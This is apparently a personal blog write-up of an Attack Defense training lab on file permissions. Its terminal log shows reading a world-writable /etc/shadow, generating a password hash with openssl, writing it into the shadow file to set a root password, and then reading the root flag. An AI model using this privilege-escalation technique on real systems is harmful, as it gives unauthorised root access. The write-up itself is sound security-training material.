Attack Defense | Permissions Matter<

Attack Defense | Permissions Matter

May 07, 2019

Scenario | The admin was tasked to create a replica of an existing Linux system. He copied the entire filesystem to his computer, made modifications to some files and then copied it onto the newly provisioned system. Unfortunately, in his haste to set the new system up, he forgot to take care of permission sets.

I spent a bunch of time…… like a whole bunch of time doing a bunch of stuff I had no business doing. Like: Searching directories, searching logs, versions, history, etc. All it really took was looking at two file permissions. {smh}. We have rw-rw-rw access on the /etc/shadow file. This means we can genrate our own hash and insert it into the file ultimately creating the root password.

					student@attackdefense:/home$ cat /root/^C
					student@attackdefense:/home$ cat /etc/shadow
					root::17764:0:99999:7::: daemon::17764:0:99999:7:::
					bin::17764:0:99999:7::: sys::17764:0:99999:7:::
					sync::17764:0:99999:7::: games::17764:0:99999:7:::
					man::17764:0:99999:7::: lp::17764:0:99999:7:::
					mail::17764:0:99999:7::: news::17764:0:99999:7:::
					uucp::17764:0:99999:7::: proxy::17764:0:99999:7:::
					www-data::17764:0:99999:7::: backup::17764:0:99999:7:::
					list::17764:0:99999:7::: irc::17764:0:99999:7:::
					gnats::17764:0:99999:7::: nobody::17764:0:99999:7:::
					_apt:*:17764:0:99999:7:::
					student:!:17797::::::
					student@attackdefense:/home$ ls -al /etc/shadow
					-rw-rw-rw- 1 root shadow 523 Sep 23 2018 /etc/shadow
					student@attackdefense:/home$ nano
					bash: nano: command not found
					student@attackdefense:/home$ openssl passwd -1 salt root pass123
					$1$4Gjx3rAa$YicC3Qx6DzMxWxtecIC/t.
					$1$57lINf0T$eJvoyiH1ye5ovOtlD.Mx21
					$1$UcKCqfNO$rPBh7zISXtnPmbOVHkxFF/
					student@attackdefense:/home$ openssl passwd -1 -salt root pass123
					$1$root$quimBCDAqK3JX3mbeqrrD1
					student@attackdefense:/home$ vi /etc/shadow
					student@attackdefense:/home$ $1$root$quimBCDAqK3JX3mbeqrrD1^C
					student@attackdefense:/home$ vi /etc/shadow
					student@attackdefense:/home$ su root
					Password:
					root@attackdefense:/home# cd /root/
					root@attackdefense:~# ls
					flag
					root@attackdefense:~# cat flag
					e62ab67ddff744d60cbb6232feaefc4d
					

All this took me about 1.5 hours. I felt kinda crappy but now know that I should pay closer attention to the title of the Labs.